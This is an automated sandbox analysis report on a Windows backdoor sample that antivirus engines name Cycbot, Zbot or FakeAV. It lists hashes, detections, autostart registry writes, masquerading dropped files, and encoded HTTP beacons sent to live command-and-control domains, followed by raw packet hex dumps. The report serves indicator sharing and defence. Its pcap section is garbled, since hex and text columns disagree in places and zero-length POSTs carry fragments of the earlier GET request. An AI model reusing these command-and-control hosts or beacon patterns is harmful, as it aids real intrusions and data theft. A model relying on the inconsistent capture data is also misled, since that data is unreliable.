Analysis Date: 2015-01-16 09:17:39
MD5: 7476c62292ea89f87a84b1f2d4195991
SHA1: 1f91d2ae1831dfee6adaa428b6988ba50069a40a

Static Details:

File type: PE32 executable for MS Windows (GUI) Intel 80386
Section: .text md5: 286a2307a99f0a535be77de9e9c931d4 sha1: ae5fc62361829b4e2c86a90117fa66d619fc0325 size: 164864
Section: .rdata md5: 18aba411bb0d55b257d57b9c44ed15a7 sha1: 23b4874e5b2d2d9e0668a85c9d5ec04089c830c9 size: 2048
Section: .data md5: 3531a822ec21f8cab380e7129ccf93cc sha1: 5e1e6db067753a4dd0f92abaa93ea592b7cb9d04 size: 25088
Section: .lib md5: 4b92efec599445ba745a1d5144ccc969 sha1: 4a93ab4376603e7d236887db56d0a2a9affef0ef size: 512
Timestamp: 2005-11-07 01:28:01
Version: PrivateBuild: 1520
PEhash: 8fb8662981114ed1d67b717c0c72bc1c612bcecc
IMPhash: a5333e8c11366f7f953c78610b8ba8af
AV: 360 Safe: no_virus
AV: Ad-Aware: Gen:Trojan.Heur.KS.1
AV: Alwil (avast): Cybota [Trj]
AV: Arcabit (arcavir): Gen:Trojan.Heur.KS.1
AV: Authentium: W32/Goolbot.E.gen!Eldorado
AV: Avira (antivir): TR/Diple.psa
AV: BullGuard: Gen:Trojan.Heur.KS.1
AV: CA (E-Trust Ino): Win32/Diple.A!generic
AV: CAT (quickheal): Backdoor.Cycbot.B
AV: ClamAV: Trojan.Agent-207401
AV: Dr. Web: Trojan.Packed.1879
AV: Emsisoft: Gen:Trojan.Heur.KS.1
AV: Eset (nod32): Win32/Kryptik.KPB
AV: Fortinet: W32/Katusha.O!tr
AV: Frisk (f-prot): W32/Goolbot.E.gen!Eldorado
AV: F-Secure: Gen:Trojan.Heur.KS.1
AV: Grisoft (avg): Cryptic.CFW
AV: Ikarus: Trojan-Spy.Win32.Zbot
AV: K7: Backdoor ( 003210941 )
AV: Kaspersky: Trojan.Win32.Diple.li
AV: MalwareBytes: Spyware.Passwords.XGen
AV: Mcafee: BackDoor-EXI.gen.h
AV: Microsoft Security Essentials: Backdoor:Win32/Cycbot.G
AV: MicroWorld (escan): Gen:Trojan.Heur.KS.1
AV: Rising: no_virus
AV: Sophos: Mal/FakeAV-IS
AV: Symantec: Trojan.Gen
AV: Trend Micro: BKDR_CYCBOT.SME3
AV: VirusBlokAda (vba32): Trojan.FakeAV.0997

Runtime Details:

Screenshot

Process
↳ C:\malware.exe

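Registry: HKEY_CURRENT_CONFIG\Software\Microsoft\windows\CurrentVersion\Internet Settings\ProxyEnable ➝ 1
Registry: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows\Load ➝ C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
(Note: the Load value under Windows NT\CurrentVersion\Windows is a per-user autostart location, so this write makes the dropped csrss.exe run at logon. A csrss.exe located outside the Windows system directory is a process-name masquerading indicator. ProxyEnable set to 1 turns on the Internet Settings proxy; together with the 127.0.0.1 Winsock lookup recorded for this process, this suggests browser traffic may be routed through a local proxy.)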
Creates File: C:\Documents and Settings\Administrator\Local Settings\History\History.IE5\index.dat
Creates File: C:\Documents and Settings\Administrator\Cookies\index.dat
Creates File: PIPE\lsarpc
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temp\csrss.exe
Creates File: C:\Documents and Settings\Administrator\Application Data\75DE.FFC
Creates File: \Device\Afd\Endpoint
Creates File: C:\Documents and Settings\Administrator\Local Settings\Temporary Internet Files\Content.IE5\index.dat
Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft
Creates Process: C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data
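Creates Mutex: {4D92BB9F-9A66-458f-ACA4-66172A7016D4}
Creates Mutex: WininetConnectionMutex
Creates Mutex: c:!documents and settings!administrator!cookies!
Creates Mutex: {61B98B86-5F44-42b3-BCA1-33904B067B81}
Creates Mutex: {EEEB680D-AE62-4375-B93E-E9AE5FF585C1}
Creates Mutex: c:!documents and settings!administrator!local settings!history!history.ie5!
Creates Mutex: {B37C48AF-B05C-4520-8B38-2FE181D5DC78}
Creates Mutex: c:!documents and settings!administrator!local settings!temporary internet files!content.ie5!
(Note: WininetConnectionMutex and the path-style mutex names are created by the WinINet library for any process that uses it, so they are not specific to this sample. The GUID-named mutexes are the more useful candidates for host indicators.)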
Winsock DNS: differentdata-one.com
Winsock DNS: 127.0.0.1
Winsock DNS: freemaildotaccess.com
Winsock DNS: remotesupportsystem.com

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe%C:\Documents and Settings\Administrator\Application Data\Microsoft

Creates Process: C:\Documents and Settings\Administrator\Application Data\Microsoft\conhost.exe

Process
↳ C:\malware.exe startC:\Documents and Settings\Administrator\Application Data\dwm.exe%C:\Documents and Settings\Administrator\Application Data

Creates Process: C:\Documents and Settings\Administrator\Application Data\dwm.exe

Process
↳ C:\Documents and Settings\Administrator\Application Data\dwm.exe

Network Details:

DNS: remotesupportsystem.com
Type: A
69.13.210.253
DNS: zonetf.com
Type: A
141.8.225.80
DNS: freemaildotaccess.com
Type: A
DNS: differentdata-one.com
Type: A
HTTP GEThttp://remotesupportsystem.com/images/rssuni_small.gif?tq=gP4aKydAic6p17YhX0MqV2c%2BNwF1HcwqI8jZlk1MW4E3L3qgD4sDa010iFDG2thsLaVeIpa%2BYoQ89gz3nTKkFCg0by4xVw9pbT4PlBGeR0I%2Fy%2BctrLMX9nGGeAM%2FLstreu01j1f0olTKTaNM5qcjrrOxT1o4Bpa4%2FzxYrLPHGCYjI7va24hP3Xf%2FkcykewqakqYAkO8hSTBT4qogN7DkIyj226TLLIHW2cP03DQI1h1iLtimk9pqHEBf0Z00v5X3cQ%2F%2BM0yFXzcYrOD0jF9pbVhCDA7ozMEE%2BORkKoKgfRe99U1RzcmoturnO3Sv%2FI0EGfrvaoAg1DjYsIfG8IMxlWHV7HfR61RAaK3nj78PDSTydxpclUXKqWdWy3MWMcCBiXbTOpmzuFWT7X6YWFw8k1VwcP%2FFeEvMHPB8C6mVhlUDsD8F5l9O87XshXinY1Asw5Qro3k9C42KY7Wqz7nKawLSoYcEi3dnHdwmonJz5IivpKwOvPX2ldapaaVkiTuHxDJ1pT7%2BvdB8E1z6TqzcGJq7ej1PDQbSY0DiTBjnM983TGF2HTkCl8kOd9kMr3MRk3G0P7q33y5p%2BEPK0STxo%2Fxr%2FvKlDPqL9V6yFJ2zZEiZt35%2BCwnw6Z3arBPgygbKJVHlcxxmZ5eRHosZ
User-Agent: opera/8.11
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOpPRO%2FUq%2F3vleWbkY%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJsX%2BSNxlKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88y%2BcoJtX%2BSNxFKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2FMe%2BcoJuX%2BSNxVKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh88BSr%2Fe%2BV5ZuRg%3D%3D
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh8sG%2BcoJtX%2BSNw1Kv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
HTTP POSThttp://zonetf.com/index.html?tq=gKY0sHoL7L%2BN6yLhbz627sHdMfJrX%2BP9h%2BI0sDkX9PiwrWL2GUr0%2BbGpfvRsX%2BaIwb51gW1f447GrXf0eU2S%2BsSodOFuTLiv0agDh2xP6PLEqwaCGkrl%2F7LdBPNpPpTuxq00sD0OpLjRqAOhLgjh%2F82%2BcoJuX%2BSNxb5ygm1C4lKv975Xlm5G
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
Flows TCP: 192.168.1.1:1031 ➝ 69.13.210.253:80
Flows TCP: 192.168.1.1:1032 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1033 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1034 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1035 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1036 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1037 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1038 ➝ 141.8.225.80:80
Flows TCP: 192.168.1.1:1039 ➝ 141.8.225.80:80

Raw Pcap
0x00000000 (00000)   47455420 2f696d61 6765732f 72737375   GET /images/rssu
0x00000010 (00016)   6e695f73 6d616c6c 2e676966 3f74713d   ni_small.gif?tq=
0x00000020 (00032)   67503461 4b796441 69633670 31375968   gP4aKydAic6p17Yh
0x00000030 (00048)   58304d71 56326325 32424e77 46314863   X0MqV2c%2BNwF1Hc
0x00000040 (00064)   77714938 6a5a6c6b 314d5734 45334c33   wqI8jZlk1MW4E3L3
0x00000050 (00080)   71674434 73446130 31306946 44473274   qgD4sDa010iFDG2t
0x00000060 (00096)   68734c61 56654970 61253242 596f5138   hsLaVeIpa%2BYoQ8
0x00000070 (00112)   39677a33 6e544b6b 46436730 62793478   9gz3nTKkFCg0by4x
0x00000080 (00128)   56773970 62543450 6c424765 52304925   Vw9pbT4PlBGeR0I%
0x00000090 (00144)   32467925 32426374 724c4d58 396e4747   2Fy%2BctrLMX9nGG
0x000000a0 (00160)   65414d25 32464c73 74726575 30316a31   eAM%2FLstreu01j1
0x000000b0 (00176)   66306f6c 544b5461 4e4d3571 636a7272   f0olTKTaNM5qcjrr
0x000000c0 (00192)   4f785431 6f344270 61342532 467a7859   OxT1o4Bpa4%2FzxY
0x000000d0 (00208)   724c5048 4743596a 49377661 32346850   rLPHGCYjI7va24hP
0x000000e0 (00224)   33586625 32466b63 796b6577 71616b71   3Xf%2Fkcykewqakq
0x000000f0 (00240)   59416b4f 38685354 42543471 6f674e37   YAkO8hSTBT4qogN7
0x00000100 (00256)   446b4979 6a323236 544c4c49 48573263   DkIyj226TLLIHW2c
0x00000110 (00272)   50303344 51493168 31694c74 696d6b39   P03DQI1h1iLtimk9
0x00000120 (00288)   70714845 4266305a 30307635 58336351   pqHEBf0Z00v5X3cQ
0x00000130 (00304)   25324625 32424d30 7946587a 6359724f   %2F%2BM0yFXzcYrO
0x00000140 (00320)   44306a46 39706256 68434441 376f7a4d   D0jF9pbVhCDA7ozM
0x00000150 (00336)   45452532 424f526b 4b6f4b67 66526539   EE%2BORkKoKgfRe9
0x00000160 (00352)   39553152 7a636d6f 7475726e 4f335376   9U1RzcmoturnO3Sv
0x00000170 (00368)   25324649 30454766 7276616f 41673144   %2FI0EGfrvaoAg1D
0x00000180 (00384)   6a597349 66473849 4d786c57 48563748   jYsIfG8IMxlWHV7H
0x00000190 (00400)   66523631 5241614b 336e6a37 38504453   fR61RAaK3nj78PDS
0x000001a0 (00416)   54796478 70636c55 584b7157 64577933   TydxpclUXKqWdWy3
0x000001b0 (00432)   4d574d63 43426958 62544f70 6d7a7546   MWMcCBiXbTOpmzuF
0x000001c0 (00448)   57543758 36595746 77386b31 56776350   WT7X6YWFw8k1VwcP
0x000001d0 (00464)   25324646 6545764d 48504238 43366d56   %2FFeEvMHPB8C6mV
0x000001e0 (00480)   686c5544 73443846 356c394f 38375873   hlUDsD8F5l9O87Xs
0x000001f0 (00496)   6858696e 59314173 77355172 6f336b39   hXinY1Asw5Qro3k9
0x00000200 (00512)   4334324b 59375771 7a376e4b 61774c53   C42KY7Wqz7nKawLS
0x00000210 (00528)   6f596345 6933646e 4864776d 6f6e4a7a   oYcEi3dnHdwmonJz
0x00000220 (00544)   35496976 704b774f 76505832 6c646170   5IivpKwOvPX2ldap
0x00000230 (00560)   6161566b 69547548 78444a31 70543725   aaVkiTuHxDJ1pT7%
0x00000240 (00576)   32427664 42384531 7a365471 7a63474a   2BvdB8E1z6TqzcGJ
0x00000250 (00592)   7137656a 31504451 62535930 44695442   q7ej1PDQbSY0DiTB
0x00000260 (00608)   6a6e4d39 38335447 46324854 6b436c38   jnM983TGF2HTkCl8
0x00000270 (00624)   6b4f6439 6b4d7233 4d526b33 47305037   kOd9kMr3MRk3G0P7
0x00000280 (00640)   71333379 35702532 4245504b 30535478   q33y5p%2BEPK0STx
0x00000290 (00656)   6f253246 78722532 46764b6c 4450714c   o%2Fxr%2FvKlDPqL
0x000002a0 (00672)   39563679 464a327a 5a45695a 74333525   9V6yFJ2zZEiZt35%
0x000002b0 (00688)   32424377 6e77365a 33617242 50677967   2BCwnw6Z3arBPgyg
0x000002c0 (00704)   624b4a56 486c6378 786d5a35 6552486f   bKJVHlcxxmZ5eRHo
0x000002d0 (00720)   735a2048 5454502f 312e300d 0a436f6e   sZ HTTP/1.0..Con
0x000002e0 (00736)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000002f0 (00752)   486f7374 3a207265 6d6f7465 73757070   Host: remotesupp
0x00000300 (00768)   6f727473 79737465 6d2e636f 6d0d0a41   ortsystem.com..A
0x00000310 (00784)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000320 (00800)   2d416765 6e743a20 6f706572 612f382e   -Agent: opera/8.
0x00000330 (00816)   31310d0a 0d0a                         11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f705052 4f253246 55712532 4633766c   OpPRO%2FUq%2F3vl
0x000000c0 (00192)   6557626b 59253344 20485454 502f312e   eWbkY%3D HTTP/1.
0x000000d0 (00208)   310d0a48 6f73743a 207a6f6e 6574662e   1..Host: zonetf.
0x000000e0 (00224)   636f6d0d 0a557365 722d4167 656e743a   com..User-Agent:
0x000000f0 (00240)   204d6f7a 696c6c61 2f342e30 2028636f    Mozilla/4.0 (co
0x00000100 (00256)   6d706174 69626c65 3b204d53 49452036   mpatible; MSIE 6
0x00000110 (00272)   2e303b20 57696e64 6f777320 4e542035   .0; Windows NT 5
0x00000120 (00288)   2e31290d 0a436f6e 74656e74 2d4c656e   .1)..Content-Len
0x00000130 (00304)   6774683a 20300d0a 436f6e6e 65637469   gth: 0..Connecti
0x00000140 (00320)   6f6e3a20 636c6f73 650d0a0d 0a333420   on: close....34 
0x00000150 (00336)   34353333 34633333 20202077 7149386a   45334c33   wqI8j
0x00000160 (00352)   5a6c6b31 4d573445 334c330a            Zlk1MW4E3L3.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 42537225 32466525   OhLgjh88BSr%2Fe%
0x000000c0 (00192)   32425635 5a755267 25334425 33442048   2BV5ZuRg%3D%3D H
0x000000d0 (00208)   5454502f 312e310d 0a486f73 743a207a   TTP/1.1..Host: z
0x000000e0 (00224)   6f6e6574 662e636f 6d0d0a55 7365722d   onetf.com..User-
0x000000f0 (00240)   4167656e 743a204d 6f7a696c 6c612f34   Agent: Mozilla/4
0x00000100 (00256)   2e302028 636f6d70 61746962 6c653b20   .0 (compatible; 
0x00000110 (00272)   4d534945 20362e30 3b205769 6e646f77   MSIE 6.0; Window
0x00000120 (00288)   73204e54 20352e31 290d0a43 6f6e7465   s NT 5.1)..Conte
0x00000130 (00304)   6e742d4c 656e6774 683a2030 0d0a436f   nt-Length: 0..Co
0x00000140 (00320)   6e6e6563 74696f6e 3a20636c 6f73650d   nnection: close.
0x00000150 (00336)   0a0d0a33 34633333 20202077 7149386a   ...34c33   wqI8j
0x00000160 (00352)   5a6c6b31 4d573445 334c330a            Zlk1MW4E3L3.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683873 47253242 636f4a73   OhLgjh8sG%2BcoJs
0x000000c0 (00192)   58253242 534e786c 4b763937 35586c6d   X%2BSNxlKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a6b 4b6f4b67 66526539   ose....kKoKgfRe9
0x00000160 (00352)   39553152 7a636d6f 7475726e 4f335376   9U1RzcmoturnO3Sv
0x00000170 (00368)   25324649 30454766 7276616f 41673144   %2FI0EGfrvaoAg1D
0x00000180 (00384)   6a597349 66473849 4d786c57 48563748   jYsIfG8IMxlWHV7H
0x00000190 (00400)   66523631 5241614b 336e6a37 38504453   fR61RAaK3nj78PDS
0x000001a0 (00416)   54796478 70636c55 584b7157 64577933   TydxpclUXKqWdWy3
0x000001b0 (00432)   4d574d63 43426958 62544f70 6d7a7546   MWMcCBiXbTOpmzuF
0x000001c0 (00448)   57543758 36595746 77386b31 56776350   WT7X6YWFw8k1VwcP
0x000001d0 (00464)   25324646 6545764d 48504238 43366d56   %2FFeEvMHPB8C6mV
0x000001e0 (00480)   686c5544 73443846 356c394f 38375873   hlUDsD8F5l9O87Xs
0x000001f0 (00496)   6858696e 59314173 77355172 6f336b39   hXinY1Asw5Qro3k9
0x00000200 (00512)   4334324b 59375771 7a376e4b 61774c53   C42KY7Wqz7nKawLS
0x00000210 (00528)   6f596345 6933646e 4864776d 6f6e4a7a   oYcEi3dnHdwmonJz
0x00000220 (00544)   35496976 704b774f 76505832 6c646170   5IivpKwOvPX2ldap
0x00000230 (00560)   6161566b 69547548 78444a31 70543725   aaVkiTuHxDJ1pT7%
0x00000240 (00576)   32427664 42384531 7a365471 7a63474a   2BvdB8E1z6TqzcGJ
0x00000250 (00592)   7137656a 31504451 62535930 44695442   q7ej1PDQbSY0DiTB
0x00000260 (00608)   6a6e4d39 38335447 46324854 6b436c38   jnM983TGF2HTkCl8
0x00000270 (00624)   6b4f6439 6b4d7233 4d526b33 47305037   kOd9kMr3MRk3G0P7
0x00000280 (00640)   71333379 35702532 4245504b 30535478   q33y5p%2BEPK0STx
0x00000290 (00656)   6f253246 78722532 46764b6c 4450714c   o%2Fxr%2FvKlDPqL
0x000002a0 (00672)   39563679 464a327a 5a45695a 74333525   9V6yFJ2zZEiZt35%
0x000002b0 (00688)   32424377 6e77365a 33617242 50677967   2BCwnw6Z3arBPgyg
0x000002c0 (00704)   624b4a56 486c6378 786d5a35 6552486f   bKJVHlcxxmZ5eRHo
0x000002d0 (00720)   735a2048 5454502f 312e300d 0a436f6e   sZ HTTP/1.0..Con
0x000002e0 (00736)   6e656374 696f6e3a 20636c6f 73650d0a   nection: close..
0x000002f0 (00752)   486f7374 3a207265 6d6f7465 73757070   Host: remotesupp
0x00000300 (00768)   6f727473 79737465 6d2e636f 6d0d0a41   ortsystem.com..A
0x00000310 (00784)   63636570 743a202a 2f2a0d0a 55736572   ccept: */*..User
0x00000320 (00800)   2d416765 6e743a20 6f706572 612f382e   -Agent: opera/8.
0x00000330 (00816)   31310d0a 0d0a                         11....

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a683838 79253242 636f4a74   OhLgjh88y%2BcoJt
0x000000c0 (00192)   58253242 534e7846 4b763937 35586c6d   X%2BSNxFKv975Xlm
0x000000d0 (00208)   35472048 5454502f 312e310d 0a486f73   5G HTTP/1.1..Hos
0x000000e0 (00224)   743a207a 6f6e6574 662e636f 6d0d0a55   t: zonetf.com..U
0x000000f0 (00240)   7365722d 4167656e 743a204d 6f7a696c   ser-Agent: Mozil
0x00000100 (00256)   6c612f34 2e302028 636f6d70 61746962   la/4.0 (compatib
0x00000110 (00272)   6c653b20 4d534945 20362e30 3b205769   le; MSIE 6.0; Wi
0x00000120 (00288)   6e646f77 73204e54 20352e31 290d0a43   ndows NT 5.1)..C
0x00000130 (00304)   6f6e7465 6e742d4c 656e6774 683a2030   ontent-Length: 0
0x00000140 (00320)   0d0a436f 6e6e6563 74696f6e 3a20636c   ..Connection: cl
0x00000150 (00336)   6f73650d 0a0d0a33 20202077 7149386a   ose....3   wqI8j
0x00000160 (00352)   5a6c6b31 4d573445 334c330a            Zlk1MW4E3L3.

0x00000000 (00000)   504f5354 202f696e 6465782e 68746d6c   POST /index.html
0x00000010 (00016)   3f74713d 674b5930 73486f4c 374c2532   ?tq=gKY0sHoL7L%2
0x00000020 (00032)   424e3679 4c68627a 36323773 48644d66   BN6yLhbz627sHdMf
0x00000030 (00048)   4a725825 32425039 68253242 49307344   JrX%2BP9h%2BI0sD
0x00000040 (00064)   6b583950 69777257 4c324755 72302532   kX9PiwrWL2GUr0%2
0x00000050 (00080)   42624770 66765273 58253242 61497762   BbGpfvRsX%2BaIwb
0x00000060 (00096)   35316757 31663434 37477258 66306555   51gW1f447GrXf0eU
0x00000070 (00112)   32532532 4273536f 644f4675 544c6976   2S%2BsSodOFuTLiv
0x00000080 (00128)   30616744 68327850 36504c45 71776143   0agDh2xP6PLEqwaC
0x00000090 (00144)   476b726c 25324637 4c644250 4e705070   Gkrl%2F7LdBPNpPp
0x000000a0 (00160)   54757871 30307344 304f704c 6a527141   Tuxq00sD0OpLjRqA
0x000000b0 (00176)   4f684c67 6a682532 464d6525 3242636f   OhLgjh%2FMe%2Bco
0x000000c0 (00192)   4a755825 3242534e 78564b76 39373558   JuX%2BSNxVKv975X
0x000000d0 (00208)   6c6d3547 20485454 502f312e 310d0a48   lm5G HTTP/1.1..H
0x000000e0 (00224)   6f73743a 207a6f6e 6574662e 636f6d0d   ost: zonetf.com.
0x000000f0 (00240)   0a557365 722d4167 656e743a 204d6f7a   .User-Agent: Moz
0x00000100 (00256)   696c6c61 2f342e30 2028636f 6d706174   illa/4.0 (compat
0x00000110 (00272)   69626c65 3b204d53 49452036 2e303b20   ible; MSIE 6.0; 
0x00000120 (00288)   57696e64 6f777320 4e542035 2e31290d   Windows NT 5.1).
0x00000130 (00304)   0a436f6e 74656e74 2d4c656e 6774683a   .Content-Length:
0x00000140 (00320)   20300d0a 436f6e6e 65637469 6f6e3a20    0..Connection: 
0x00000150 (00336)   636c6f73 650d0a0d 0a6f4b67 66526539   close....oKgfRe9
0x00000160 (00352)   39553152 7a636d6f 7475726e 4f335376   9U1RzcmoturnO3Sv
0x00000170 (00368)   25324649 30454766 7276616f 41673144   %2FI0EGfrvaoAg1D
0x00000180 (00384)   6a597349 66473849 4d786c57 48563748   jYsIfG8IMxlWHV7H
0x00000190 (00400)   66523631 5241614b 336e6a37 38504453   fR61RAaK3nj78PDS
0x000001a0 (00416)   54796478 70636c55 584b7157 64577933   TydxpclUXKqWdWy3
0x000001b0 (00432)   4d574d63 43426958 62544f70 6d7a7546   MWMcCBiXbTOpmzuF
0x000001c0 (00448)   57543758 36595746 77386b31 56776350   WT7X6YWFw8k1VwcP
0x000001d0 (00464)   25324646 6545764d 48504238 43366d56   %2FFeEvMHPB8C6mV
